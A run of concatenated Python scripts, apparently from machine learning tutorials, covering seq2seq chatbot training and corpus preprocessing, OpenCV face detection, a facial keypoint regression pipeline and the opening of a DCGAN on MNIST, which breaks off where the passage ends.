from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
# word-level chatbot training: stream question/answer pairs through a
# generator with a tokenizer shared between source and target
text_gen = NMTGenerator(source_file="data/questions",
                        target_file="data/answers",
                        batch_size=32,
                        same_tokenizer=True,
                        verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
# pretrained GloVe vectors used to initialise the embedding layer
embedding_vectors = get_embedding_vectors(tokenizer)
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
# one shared vocabulary size covering encoder and decoder
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 300
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_matrix=embedding_vectors)
model.summary()
enc.summary()
dec.summary()
# the inference sub-models are not needed during training; free them
del enc
del dec
print("[+] Models created.")
model.compile(optimizer="rmsprop", loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
# checkpoint after every epoch; file name embeds validation metrics
checkpointer = ModelCheckpoint("results/chatbot_v13_{val_loss:.3f}_{val_acc:.3f}.h5", save_best_only=False, verbose=1)
# resume training from the last saved weights
model.load_weights("results/chatbot_v13_4.806_0.219.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
                    validation_data=text_gen.next_validation(),
                    verbose=1,
                    steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size),
                    validation_steps=(len(text_gen.X_test) // text_gen.batch_size),
                    callbacks=[checkpointer],
                    epochs=5)
print("[+] Model trained.")
model.save_weights("results/chatbot_v13.h5")
print("[+] Model saved.")
import numpy as np
import pickle
from models import encoder_decoder_model
from generator import NMTGenerator, get_embedding_vectors
from preprocess import load_dataset
from keras.callbacks import ModelCheckpoint
from keras_adabound import AdaBound
# character-level chatbot training: same Q/A corpus, char tokenization
text_gen = NMTGenerator(source_file="data/questions",
                        target_file="data/answers",
                        batch_size=256,
                        same_tokenizer=True,
                        char_level=True,
                        verbose=2)
text_gen.load_dataset()
print("[+] Dataset loaded.")
num_encoder_tokens = text_gen.num_encoder_tokens
num_decoder_tokens = text_gen.num_decoder_tokens
# get tokenizer
tokenizer = text_gen.x_tk
print("text_gen.source_sequence_length:", text_gen.source_sequence_length)
print("text_gen.target_sequence_length:", text_gen.target_sequence_length)
# one shared vocabulary size covering encoder and decoder
num_tokens = max([num_encoder_tokens, num_decoder_tokens])
latent_dim = 384
# char-level model takes one-hot inputs directly; no embedding layer
model, enc, dec = encoder_decoder_model(num_tokens, latent_dim, num_tokens, embedding_layer=False)
model.summary()
enc.summary()
dec.summary()
# the inference sub-models are not needed during training; free them
del enc
del dec
print("[+] Models created.")
model.compile(optimizer=AdaBound(lr=1e-3, final_lr=0.1), loss="categorical_crossentropy", metrics=["accuracy"])
print("[+] Model compiled.")
# pickle.dump(x_tk, open("results/x_tk.pickle", "wb"))
print("[+] X tokenizer serialized.")
# pickle.dump(y_tk, open("results/y_tk.pickle", "wb"))
print("[+] y tokenizer serialized.")
# X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
# y = y.reshape((y.shape[0], y.shape[2], y.shape[1]))
print("[+] Dataset reshaped.")
# print("X1.shape:", X1.shape)
# print("X2.shape:", X2.shape)
# print("y.shape:", y.shape)
# checkpoint after every epoch; file name embeds validation metrics
checkpointer = ModelCheckpoint("results/chatbot_charlevel_v2_{val_loss:.2f}_{val_acc:.2f}.h5", save_best_only=False, verbose=1)
# resume training from the last saved weights
model.load_weights("results/chatbot_charlevel_v2_0.32_0.90.h5")
# model.fit([X1, X2], y,
model.fit_generator(text_gen.next_train(),
                    validation_data=text_gen.next_validation(),
                    verbose=1,
                    steps_per_epoch=(len(text_gen.X_train) // text_gen.batch_size)+1,
                    validation_steps=(len(text_gen.X_test) // text_gen.batch_size)+1,
                    callbacks=[checkpointer],
                    epochs=50)
print("[+] Model trained.")
model.save_weights("results/chatbot_charlevel_v2.h5")
print("[+] Model saved.")
import tqdm
# Split the concatenated europarl fr-en dump into separate English and
# French files: non-header lines up to index 2007722 are English, the
# remainder French.
X, y = [], []
with open("data/fr-en", encoding='utf8') as f:
    for i, line in tqdm.tqdm(enumerate(f), "Reading file"):
        # skip embedded file-name header lines
        if "europarl-v7" in line:
            continue
        # X.append(line)
        # if i == 2007723 or i == 2007724 or i == 2007725
        if i <= 2007722:
            X.append(line.strip())
        else:
            y.append(line.strip())
# drop the final French line so both halves align 1:1
# NOTE(review): assumes the dump has exactly one extra French line — confirm.
y.pop(-1)
with open("data/en", "w", encoding='utf8') as f:
    for i in tqdm.tqdm(X, "Writing english"):
        print(i, file=f)
with open("data/fr", "w", encoding='utf8') as f:
    for i in tqdm.tqdm(y, "Writing french"):
        print(i, file=f)
import glob
import tqdm
import os
import random
import inflect
# inflect engine: spells out digit tokens ("2" -> "two") in map_text()
p = inflect.engine()
X, y = [], []
# control/function tokens that must pass through the mapper verbatim
special_words = {
    "haha", "rockikz", "fullclip", "xanthoss", "aw", "wow", "ah", "oh", "god", "quran", "allah",
    "muslims", "muslim", "islam", "?", ".", ",",
    '_func_val_get_callme_para1_comma0', '_num2_', '_func_val_get_last_question', '_num1_',
    '_func_val_get_number_plus_para1__num1__para2__num2_',
    '_func_val_update_call_me_enforced_para1__callme_',
    '_func_val_get_number_minus_para1__num2__para2__num1_', '_func_val_get_weekday_para1_d0',
    '_func_val_update_user_name_para1__name_', '_callme_', '_func_val_execute_pending_action_and_reply_para1_no',
    '_func_val_clear_user_name_and_call_me', '_func_val_get_story_name_para1_the_velveteen_rabbit', '_ignored_',
    '_func_val_get_number_divide_para1__num1__para2__num2_', '_func_val_get_joke_anyQ:',
    '_func_val_update_user_name_and_call_me_para1__name__para2__callme_', '_func_val_get_number_divide_para1__num2__para2__num1_Q:',
    '_name_', '_func_val_ask_name_if_not_yet', '_func_val_get_last_answer', '_func_val_continue_last_topic',
    '_func_val_get_weekday_para1_d1', '_func_val_get_number_minus_para1__num1__para2__num2_', '_func_val_get_joke_any',
    '_func_val_get_story_name_para1_the_three_little_pigs', '_func_val_update_call_me_para1__callme_',
    '_func_val_get_story_name_para1_snow_white', '_func_val_get_today', '_func_val_get_number_multiply_para1__num1__para2__num2_',
    '_func_val_update_user_name_enforced_para1__name_', '_func_val_get_weekday_para1_d_2', '_func_val_correct_user_name_para1__name_',
    '_func_val_get_time', '_func_val_get_number_divide_para1__num2__para2__num1_', '_func_val_get_story_any',
    '_func_val_execute_pending_action_and_reply_para1_yes', '_func_val_get_weekday_para1_d_1', '_func_val_get_weekday_para1_d2'
}
# known English vocabulary; anything outside every table becomes _unk_
# FIX: use context managers so file handles are not leaked (the original
# left words8.txt, the GloVe file and maps.txt open).
with open("data/words8.txt") as words_file:
    english_words = { word.strip() for word in words_file }
# vocabulary covered by the pretrained GloVe embeddings
embedding_words = set()
with open("data/glove.6B.300d.txt", encoding='utf8') as glove_file:
    for line in tqdm.tqdm(glove_file, "Reading GloVe words"):
        values = line.split()
        word = values[0]
        embedding_words.add(word)
# manual word -> replacement table, one "key => value" entry per line
with open("data/maps.txt") as maps_file:
    maps = maps_file.readlines()
word_mapper = {}
for mapping in maps:  # renamed from `map` to avoid shadowing the builtin
    key, value = mapping.split("=>")
    key = key.strip()
    value = value.strip()
    print(f"Mapping {key} to {value}")
    word_mapper[key.lower()] = value
# per-category counters updated as a side effect by map_text()
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
def map_text(line):
    """Map every word of *line* into the model vocabulary.

    Digit tokens are spelled out, manual mappings applied, English and
    special tokens kept as-is, and anything else replaced by ``_unk_``.
    Updates the module-level category counters as a side effect.

    :param line: raw input sentence
    :return: mapped sentence as a single space-joined string
    """
    global unks
    global digits
    global mapped
    global english
    global special
    out = []
    for token in line.split():
        token = token.lower()
        if token.isdigit():
            # spell numbers out so they share the word vocabulary
            out.append(p.number_to_words(token))
            digits += 1
        elif token in word_mapper:
            out.append(word_mapper[token])
            mapped += 1
        elif token in english_words:
            out.append(token)
            english += 1
        elif token in special_words:
            out.append(token)
            special += 1
        else:
            out.append("_unk_")
            unks += 1
    return ' '.join(out)
# Read every Q:/A: pair from the augmented data files, shuffle the pairs
# in unison, then map each line into the model vocabulary and write the
# parallel questions/answers corpora.
for file in tqdm.tqdm(glob.glob("data/Augment*/*"), "Reading files"):
    with open(file, encoding='utf8') as f:
        for line in f:
            line = line.strip()
            if "Q: " in line:
                X.append(line)
            elif "A: " in line:
                y.append(line)
# shuffle X and y maintaining the order
combined = list(zip(X, y))
random.shuffle(combined)
X[:], y[:] = zip(*combined)
with open("data/questions", "w") as f:
    for line in tqdm.tqdm(X, "Writing questions"):
        line = line.strip()
        # BUG FIX: lstrip('Q: ') strips the *character set* {'Q', ':', ' '},
        # which also eats a leading 'Q'/':' belonging to the question text
        # itself (e.g. "Q: Quite" -> "uite"); remove the exact marker instead.
        if line.startswith("Q: "):
            line = line[len("Q: "):]
        line = map_text(line)
        print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
# reset counters so the answer statistics are reported separately
unks = 0
digits = 0
mapped = 0
english = 0
special = 0
with open("data/answers", "w") as f:
    for line in tqdm.tqdm(y, "Writing answers"):
        line = line.strip()
        # BUG FIX: same character-set-vs-prefix issue as above for "A: ".
        if line.startswith("A: "):
            line = line[len("A: "):]
        line = map_text(line)
        print(line, file=f)
print()
print("[!] Unks:", unks)
print("[!] digits:", digits)
print("[!] Mapped:", mapped)
print("[!] english:", english)
print("[!] special:", special)
print()
import numpy as np
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale (haar cascades operate on single-channel images)
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
# BUG FIX: "fontalface" -> "frontalface"; OpenCV ships the cascade as
# haarcascade_frontalface_default.xml, and CascadeClassifier silently
# yields an empty (non-detecting) cascade for a missing path.
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_frontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
    cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import numpy as np
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
# BUG FIX: "fontalface" -> "frontalface"; OpenCV ships the cascade as
# haarcascade_frontalface_default.xml, and CascadeClassifier silently
# yields an empty (non-detecting) cascade for a missing path.
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_frontalface_default.xml")
# live loop: grab a frame, detect faces, draw rectangles; 'q' quits
while True:
    # read the image from the cam
    _, image = cap.read()
    # converting to grayscale
    image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    # detect all the faces in the image
    faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
    # for every face, draw a blue rectangle
    for x, y, width, height in faces:
        cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
    cv2.imshow("image", image)
    if cv2.waitKey(1) == ord("q"):
        break
# release the camera and close the preview window
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
from models import create_model
from parameters import *
from utils import normalize_image
def untransform(keypoints):
    """Undo the (k - 100) / 50 keypoint normalisation (back to pixels)."""
    return (keypoints * 50) + 100
def get_single_prediction(model, image):
    """Predict keypoints for one image (a batch axis is added internally).

    :param model: Keras model whose flat output reshapes to OUTPUT_SHAPE
    :param image: single preprocessed image array
    :return: keypoints array of shape OUTPUT_SHAPE
    """
    batch = np.expand_dims(image, axis=0)
    flat_keypoints = model.predict(batch)[0]
    return np.reshape(flat_keypoints, OUTPUT_SHAPE)
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
    """Display *image* with predicted (magenta) and optional true (green)
    keypoints; both are first mapped back to pixel coordinates."""
    pred = untransform(predicted_keypoints)
    plt.imshow(np.squeeze(image), cmap="gray")
    plt.scatter(pred[:, 0], pred[:, 1], s=20, marker=".", c="m")
    if true_keypoints is not None:
        truth = untransform(true_keypoints)
        plt.scatter(truth[:, 0], truth[:, 1], s=20, marker=".", c="g")
    plt.show()
# load the input image (BGR) from the CLI argument, convert to RGB
image = cv2.imread(sys.argv[1])
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# # construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1.h5")
face_cascade = cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
# get all the faces in the image
faces = face_cascade.detectMultiScale(image, 1.2, 2)
# predict and display keypoints on every detected face crop
for (x, y, w, h) in faces:
    cv2.rectangle(image, (x, y), (x+w, y+h), (255, 0, 0), 3)
    face_image = image.copy()[y: y+h, x: x+w]
    face_image = normalize_image(face_image)
    keypoints = get_single_prediction(model, face_image)
    show_keypoints(face_image, keypoints)
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import cv2
from models import create_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data, resize_image, normalize_keypoints, normalize_image
def get_single_prediction(model, image):
    """Run the model on a single image and return OUTPUT_SHAPE keypoints."""
    as_batch = image[np.newaxis]
    prediction = model.predict(as_batch)
    return prediction[0].reshape(*OUTPUT_SHAPE)
def get_predictions(model, X):
    """Predict keypoints for a batch; result has shape (n, *OUTPUT_SHAPE)."""
    flat = model.predict(X)
    return flat.reshape((-1,) + tuple(OUTPUT_SHAPE))
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
    """Plot *image* with predicted keypoints in magenta and, when given,
    ground-truth keypoints in green (both rescaled to pixels first)."""
    pred = untransform(predicted_keypoints)
    plt.imshow(image, cmap="gray")
    plt.scatter(pred[:, 0], pred[:, 1], s=20, marker=".", c="m")
    if true_keypoints is not None:
        truth = untransform(true_keypoints)
        plt.scatter(truth[:, 0], truth[:, 1], s=20, marker=".", c="g")
    plt.show()
def show_keypoints_cv2(image, predicted_keypoints, true_keypoints=None):
    """Draw keypoints on *image* with cv2.circle and return the image.

    :param image: image array to draw on (returned annotated)
    :param predicted_keypoints: (n, 2) array of predicted (x, y) points
    :param true_keypoints: optional (n, 2) array of ground-truth points,
        drawn in green
    :return: the annotated image
    """
    for keypoint in predicted_keypoints:
        # BUG FIX: cv2.circle requires integer pixel coordinates; the
        # predictions arrive as floats (untransform output) and would raise.
        image = cv2.circle(image, (int(keypoint[0]), int(keypoint[1])), 2, color=2)
    if true_keypoints is not None:
        # BUG FIX: the original passed whole coordinate arrays as a single
        # center and the string "green" as the color, which cv2 rejects;
        # draw each point individually with a BGR tuple instead.
        for keypoint in true_keypoints:
            image = cv2.circle(image, (int(keypoint[0]), int(keypoint[1])), 2, color=(0, 255, 0))
    return image
def untransform(keypoints):
    """Rescale keypoints from the normalised [0, 1] range back to pixels."""
    scale = 224
    return keypoints * scale
# construct the model
model = create_model((*IMAGE_SIZE, 1), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_different-scaling.h5")
# X_test, y_test = load_data(testing_file)
# y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
# live webcam loop: normalise each frame, predict, draw keypoints; 'q' quits
cap = cv2.VideoCapture(0)
while True:
    _, frame = cap.read()
    # make a copy of the original image
    image = frame.copy()
    image = normalize_image(image)
    keypoints = get_single_prediction(model, image)
    print(keypoints[0])
    # map predictions from [0, 1] back to pixel coordinates
    keypoints = untransform(keypoints)
    # w, h = frame.shape[:2]
    # keypoints = (keypoints * [frame.shape[0] / image.shape[0], frame.shape[1] / image.shape[1]]).astype("int16")
    # frame = show_keypoints_cv2(frame, keypoints)
    image = show_keypoints_cv2(image, keypoints)
    cv2.imshow("frame", image)
    if cv2.waitKey(1) == ord("q"):
        break
cv2.destroyAllWindows()
cap.release()
from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.applications import MobileNetV2
import tensorflow as tf
import tensorflow.keras.backend as K
def smoothL1(y_true, y_pred):
    """Smooth-L1 (Huber) loss with delta = 0.5, summed over all elements.

    Quadratic below the delta threshold, linear above it — less sensitive
    to outliers than plain MSE.
    """
    delta = 0.5
    diff = K.abs(y_true - y_pred)
    quadratic = 0.5 * diff ** 2
    linear = delta * (diff - 0.5 * delta)
    return K.sum(K.switch(diff < delta, quadratic, linear))
def create_model(input_shape, output_shape):
    """Build and compile the from-scratch CNN keypoint regressor.

    Three conv blocks (32 -> 64 -> 128 filters, 5x5 kernels, 2x2 pooling)
    followed by a 256-unit dense layer and a linear regression head.

    :param input_shape: input image shape, e.g. (224, 224, 1)
    :param output_shape: number of regression outputs (flattened keypoints)
    :return: compiled Keras Sequential model (smooth-L1 loss, Adam)
    """
    # building the model
    model = Sequential()
    model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same", input_shape=input_shape))
    model.add(Activation("relu"))
    model.add(Conv2D(filters=32, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # model.add(Dropout(0.25))
    model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(Conv2D(filters=64, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # model.add(Dropout(0.25))
    model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(Conv2D(filters=128, kernel_size=(5, 5), padding="same"))
    model.add(Activation("relu"))
    model.add(MaxPooling2D(pool_size=(2, 2)))
    # model.add(Dropout(0.25))
    # model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
    # model.add(Activation("relu"))
    # model.add(Conv2D(filters=256, kernel_size=(5, 5), padding="same"))
    # model.add(Activation("relu"))
    # model.add(MaxPooling2D(pool_size=(2, 2)))
    # # model.add(Dropout(0.25))
    # flattening the convolutions
    model.add(Flatten())
    # fully-connected layers
    model.add(Dense(256))
    model.add(Activation("relu"))
    model.add(Dropout(0.5))
    # linear output: raw keypoint coordinate regression
    model.add(Dense(output_shape, activation="linear"))
    # print the summary of the model architecture
    model.summary()
    # training the model using rmsprop optimizer
    # model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
    model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
    return model
def create_mobilenet_model(input_shape, output_shape):
    """Build a MobileNetV2-based keypoint regressor via transfer learning.

    All layers except the last 4 are frozen and a linear regression head
    is attached.

    :param input_shape: RGB input shape, e.g. (224, 224, 3)
    :param output_shape: number of regression outputs (flattened keypoints)
    :return: compiled Keras Model (smooth-L1 loss, Adam)
    """
    model = MobileNetV2(input_shape=input_shape)
    # remove the last layer
    # NOTE(review): layers.pop() does not rewire a Keras functional graph;
    # the head below attaches to model.layers[-1].output *after* the pop,
    # which may still route through the old classifier — confirm intended.
    model.layers.pop()
    # freeze all the weights of the model except for the last 4 layers
    for layer in model.layers[:-4]:
        layer.trainable = False
    # construct our output dense layer
    output = Dense(output_shape, activation="linear")
    # connect it to the model
    output = output(model.layers[-1].output)
    model = Model(inputs=model.inputs, outputs=output)
    model.summary()
    # training the model using adam optimizer
    # model.compile(loss="mean_squared_error", optimizer="adam", metrics=["mean_absolute_error"])
    model.compile(loss=smoothL1, optimizer="adam", metrics=["mean_absolute_error"])
    return model
# input image size fed to the keypoint models (height, width)
IMAGE_SIZE = (224, 224)
# 68 facial keypoints, each an (x, y) pair
OUTPUT_SHAPE = (68, 2)
# training hyperparameters
BATCH_SIZE = 20
EPOCHS = 30
# CSVs mapping image file names to their flattened keypoint coordinates
training_file = "data/training_frames_keypoints.csv"
testing_file = "data/test_frames_keypoints.csv"
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
def get_predictions(model, X):
    """Predict keypoints for every sample in *X*.

    :param X: batch of preprocessed images
    :return: array of shape (len(X), *OUTPUT_SHAPE)
    """
    raw = model.predict(X)
    return np.reshape(raw, (-1,) + tuple(OUTPUT_SHAPE))
def show_keypoints(image, predicted_keypoints, true_keypoints):
    """Overlay predicted (magenta) and true (green) keypoints on *image*,
    rescaling both from the normalised range back to pixels first."""
    pred = untransform(predicted_keypoints)
    truth = untransform(true_keypoints)
    plt.imshow(np.squeeze(image), cmap="gray")
    plt.scatter(pred[:, 0], pred[:, 1], s=20, marker=".", c="m")
    plt.scatter(truth[:, 0], truth[:, 1], s=20, marker=".", c="g")
    plt.show()
def untransform(keypoints):
    """Map keypoints from the normalised [0, 1] range back to 224-px space."""
    return 224 * keypoints
# # construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
model.load_weights("results/model_smoothl1_mobilenet_crop.h5")
# load the held-out set and reshape labels to (n, 68, 2)
X_test, y_test = load_data(testing_file)
y_test = y_test.reshape(-1, *OUTPUT_SHAPE)
y_pred = get_predictions(model, X_test)
print(y_pred[0])
print(y_pred.shape)
print(y_test.shape)
print(X_test.shape)
# visually compare predictions vs ground truth on 50 test samples
for i in range(50):
    show_keypoints(X_test[i+400], y_pred[i+400], y_test[i+400])
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import MinMaxScaler
from tqdm import tqdm
# from tensorflow.keras.layers import Conv2D, Dense, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard, ModelCheckpoint
import os
from models import create_model, create_mobilenet_model
from parameters import IMAGE_SIZE, BATCH_SIZE, EPOCHS, OUTPUT_SHAPE, training_file, testing_file
from utils import load_data
# # read the training dataframe
# training_df = pd.read_csv("data/training_frames_keypoints.csv")
# # print the number of images available in the training dataset
# print("Number of images in training set:", training_df.shape[0])
def show_keypoints(image, key_points):
    """Display *image* with its keypoints overlaid as small dots."""
    plt.imshow(image)
    xs = key_points[:, 0]
    ys = key_points[:, 1]
    plt.scatter(xs, ys, s=20, marker=".")
    plt.show()
# show an example image
# n = 124
# image_name = training_df.iloc[n, 0]
# keypoints = training_df.iloc[n, 1:].values.reshape(-1, 2)
# show_keypoints(mpimg.imread(os.path.join("data", "training", image_name)), key_points=keypoints)
model_name = "model_smoothl1_mobilenet_crop"
# construct the model
model = create_mobilenet_model((*IMAGE_SIZE, 3), OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1])
# model.load_weights("results/model3.h5")
# RGB inputs (to_gray=False) because MobileNetV2 expects 3 channels
X_train, y_train = load_data(training_file, to_gray=False)
X_test, y_test = load_data(testing_file, to_gray=False)
if not os.path.isdir("results"):
    os.mkdir("results")
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
# checkpoint = ModelCheckpoint(os.path.join("results", model_name), save_best_only=True, verbose=1)
history = model.fit(X_train, y_train,
                    batch_size=BATCH_SIZE,
                    epochs=EPOCHS,
                    validation_data=(X_test, y_test),
                    # callbacks=[tensorboard, checkpoint],
                    callbacks=[tensorboard],
                    verbose=1)
# persist the final weights (checkpoints above are disabled)
model.save("results/" + model_name + ".h5")
import numpy as np
import pandas as pd
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import cv2
from tqdm import tqdm
import os
from parameters import IMAGE_SIZE, OUTPUT_SHAPE
def show_keypoints(image, predicted_keypoints, true_keypoints=None):
    """Plot *image* with predicted keypoints (magenta) and, when supplied,
    ground-truth keypoints (green). Coordinates are used as given."""
    plt.imshow(image, cmap="gray")
    px, py = predicted_keypoints[:, 0], predicted_keypoints[:, 1]
    plt.scatter(px, py, s=20, marker=".", c="m")
    if true_keypoints is not None:
        tx, ty = true_keypoints[:, 0], true_keypoints[:, 1]
        plt.scatter(tx, ty, s=20, marker=".", c="g")
    plt.show()
def resize_image(image, image_size):
    """Resize *image* to *image_size* (width, height) with OpenCV."""
    resized = cv2.resize(image, image_size)
    return resized
def random_crop(image, keypoints):
    """Randomly crop *image* to IMAGE_SIZE, shifting keypoints to match.

    :param image: source image array
    :param keypoints: flat keypoint vector; reshaped to (n, 2) pairs
    :return: tuple of (cropped image, shifted (n, 2) keypoints); when the
        image is not strictly larger than the crop window, the uncropped
        image and unshifted keypoints are returned instead
    """
    height, width = image.shape[:2]
    crop_h, crop_w = IMAGE_SIZE
    keypoints = keypoints.reshape(-1, 2)
    try:
        top = np.random.randint(0, height - crop_h)
        left = np.random.randint(0, width - crop_w)
    except ValueError:
        # randint raises when the image is <= crop size: keep it as-is
        return image, keypoints
    cropped = image[top: top + crop_h, left: left + crop_w]
    return cropped, keypoints - [left, top]
def normalize_image(image, to_gray=True):
    """Resize to IMAGE_SIZE, optionally grayscale, and scale pixels to [0, 1].

    NOTE(review): assumes *image* has a channel axis — a 2-D grayscale
    input would fail the shape[2] check below; confirm against callers.
    """
    if image.shape[2] == 4:
        # drop the alpha (opacity) channel if present
        image = image[:, :, :3]
    target_h, target_w = (int(dim) for dim in IMAGE_SIZE)
    # scale the image down/up to the model's input size
    image = resize_image(image, (target_w, target_h))
    if to_gray:
        # collapse RGB to a single luminance channel
        image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
    # normalise pixels from [0, 255] to [0, 1]
    image = image / 255.0
    if to_gray:
        # restore the channel axis so the shape is (H, W, 1)
        image = np.expand_dims(image, axis=2)
    return image
def normalize_keypoints(image, keypoints):
    """Rescale keypoints with the image resize, then normalise by 224.

    :param image: source image (its height/width define the scale factors)
    :param keypoints: flat keypoint vector (x, y interleaved)
    :return: flat keypoint vector scaled to IMAGE_SIZE then divided by 224
    """
    src_h, src_w = image.shape[:2]
    dst_h, dst_w = (int(dim) for dim in IMAGE_SIZE)
    # reshape the flat (136,) vector into (68, 2) coordinate pairs
    pairs = keypoints.reshape(-1, 2)
    # scale coordinates by the same factors as the image resize
    pairs = pairs * [dst_w / src_w, dst_h / src_h]
    # flatten back and normalise from [0, IMAGE_SIZE] to [0, 1] (experimental)
    return pairs.reshape(-1) / 224
def normalize(image, keypoints, to_gray=True):
    """Random-crop, then normalise image and keypoints consistently."""
    cropped, shifted = random_crop(image, keypoints)
    norm_img = normalize_image(cropped, to_gray=to_gray)
    norm_pts = normalize_keypoints(cropped, shifted)
    return norm_img, norm_pts
def load_data(csv_file, to_gray=True):
    """Load images and keypoints listed in *csv_file* into numpy arrays.

    NOTE(review): images are always read from data/training/ regardless of
    which CSV is passed — confirm the test images also live there.

    :param csv_file: CSV whose first column is the image name and the rest
        are flattened keypoint coordinates
    :param to_gray: forwarded to normalize()/normalize_image()
    :return: tuple (X images array, y keypoints array)
    """
    frame = pd.read_csv(csv_file)
    all_keypoints = np.array(frame.iloc[:, 1:])
    image_names = list(frame.iloc[:, 0])
    count = len(image_names)
    # pre-allocate output buffers
    X = np.zeros((count, *IMAGE_SIZE, 3), dtype="float32")
    y = np.zeros((count, OUTPUT_SHAPE[0] * OUTPUT_SHAPE[1]))
    progress = tqdm(image_names, "Loading " + os.path.basename(csv_file))
    for i, (image_name, keypoints) in enumerate(zip(progress, all_keypoints)):
        image = mpimg.imread(os.path.join("data", "training", image_name))
        X[i], y[i] = normalize(image, keypoints, to_gray=to_gray)
    return X, y
"""
DCGAN on MNIST using Keras
"""
# to use CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import numpy as np
import matplotlib.pyplot as plt
import tqdm
import glob
# from tensorflow.examples.tutorials.mnist import input_data
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten, Reshape
from keras.layers import Conv2D, Conv2DTranspose, UpSampling2D
from keras.layers import LeakyReLU, Dropout, BatchNormalization
from keras.optimizers import Adam, RMSprop
from keras.datasets import mnist
class GAN:
    """DCGAN component factory for MNIST-sized images.

    Lazily builds and caches the discriminator and generator networks and
    the two compiled training models (discriminator-only and stacked
    generator+discriminator adversarial model).
    """
    def __init__(self, img_x=28, img_y=28, img_z=1):
        # image dimensions: height, width, channels
        self.img_x = img_x
        self.img_y = img_y
        self.img_z = img_z
        self.D = None # discriminator
        self.G = None # generator
        self.AM = None # adversarial model
        self.DM = None # discriminator model
    def discriminator(self):
        """Build (once) and return the conv discriminator: image -> real/fake
        probability. Four strided conv blocks, then a sigmoid output."""
        if self.D:
            return self.D
        self.D = Sequential()
        depth = 64
        dropout = 0.4
        input_shape = (self.img_x, self.img_y, self.img_z)
        self.D.add(Conv2D(depth, 5, strides=2, input_shape=input_shape, padding="same"))
